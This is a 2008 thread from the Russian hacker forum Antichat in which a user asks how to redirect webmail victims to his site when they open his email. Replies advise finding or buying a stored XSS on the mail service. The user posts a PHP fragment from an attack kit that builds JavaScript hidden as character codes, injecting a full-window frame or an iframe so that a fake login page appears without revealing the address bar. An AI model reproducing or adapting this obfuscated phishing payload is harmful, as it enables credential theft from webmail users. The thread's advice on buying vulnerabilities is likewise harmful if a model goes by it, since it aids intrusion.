ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Редирект при открытии письма
  #1  
Старый 03.06.2008, 23:14
crackmail
Участник форума
Регистрация: 03.06.2008
Сообщений: 174
Провел на форуме:
2902191

Репутация: 45
По умолчанию Редирект при открытии письма

как можно сделать , когда юзверь находясь в своем почтовом ящике , кликнув на мое письмо , его автоматом перекидывало на определенный сайт?
 
Ответить с цитированием

  #2  
Старый 03.06.2008, 23:17
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Иши активную ксс на почтовом сервисе
 
Ответить с цитированием

  #3  
Старый 03.06.2008, 23:17
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Ну смотря какой почтовый сервер.....а вапще это тебе активную Xss надо искать..
 
Ответить с цитированием

  #4  
Старый 03.06.2008, 23:41
max_max
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
4444519

Репутация: 476
Отправить сообщение для max_max с помощью ICQ Отправить сообщение для max_max с помощью Yahoo
По умолчанию

Найти xss или купить.
 
Ответить с цитированием

  #5  
Старый 03.06.2008, 23:49
crackmail
Участник форума
Регистрация: 03.06.2008
Сообщений: 174
Провел на форуме:
2902191

Репутация: 45
По умолчанию

в шкатулке была такая фишка
// А вот сладкая инновация - вставка фрейма в натуральную величину окна,
// что позволило не редиректить жертву на левый хост, а рисовать лживый
// вход прямо в окне браузера, не паля адресную строку

Код:
	case 'redirect': 
 *for($x=0; $x !== strlen($redirect_to); $x++) // Шифруем код для редиректа на фейк
 *{
 *	if($x+1 == strlen($redirect_to)) $kopilka .= ord($redirect_to[$x]);
 *	else $kopilka .= ord($redirect_to[$x]).',';
 *}
	$kopilka = '100,111,99,117,109,101,110,11'.'6'.',46,119,114,1'.'0'.'5,116,101,40,39,60,102,114,97,109,101,115,101,116,32,99,111,108,115,'.
	'61,49,48,48,37,3'.'2'.',114,111,11'.'9'.',115,61,4'.'9'.',48,48,37,32,98,111,114,100,101,114,'.'6'.'1,48,32,102,114,97,109'.
	',101,98,111,114,100,101,114,61,48,32,102,114,97,109,101,115,112,97,99,105,110,103,61,48,62,6'.
	'0,102,114,97,109,101,32,102,114,97,109,101,98,111,114,100,101,114,61,48,32,115,114,99,61,34,'.
	$kopilka.',34,62,60,47,102,114,97,109,101,115,101,116,62,39,41'; *break;
	
	// Второе новшество - вставка ифрейма
	case 'iframe': 
 *for($x=0; $x !== strlen($iframe_addr); $x++) // Шифруем код для редиректа на фейк
 *{
 *	if($x+1 == strlen($iframe_addr)) $kopilka .= ord($iframe_addr[$x]);
 *	else $kopilka .= ord($iframe_addr[$x]).',';
 *}
	$kopilka = '120,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,10'.
	'5,102,114,97,109,101,39,41,59,120,46,115,114,99,61,34,'.$kopilka.',34,59,100,111,99,117,109,101,110,116,46,9'.
	'8,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,120,41,59'; *break;
	
	default: die('<font face=verdana color=red size=3><b>Выбрана неизвестная начинка для уязвимости!</b></font>');
	}
как это можно использовать?
 
Ответить с цитированием

  #6  
Старый 15.06.2008, 07:20
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

если бы можно было редиректить так просто -то спамеры были бы по гроб жизни обязаны))

PS только через xss -да и то только на каких нить завшивых сервисах...
ибо крупные врядли допустят такую уязвимость
 
Ответить с цитированием

  #7  
Старый 16.06.2008, 23:15
stalles
Участник форума
Регистрация: 19.07.2005
Сообщений: 180
Провел на форуме:
904806

Репутация: 52
Отправить сообщение для stalles с помощью ICQ
По умолчанию

купи xss и немороч голову!
но она стоит гдето 500 баксов
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перехват Gsm пакетов SNIFF Сотовый фрикинг 16 27.12.2009 22:25
DataLife Engine v.7.0 Nulled *DeViL* ПО для Web разработчика 3 04.05.2008 14:36
химия своими руками silveran Болталка 43 11.01.2006 22:05
Редирект из письма solyaris9 E-Mail 4 20.07.2005 13:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ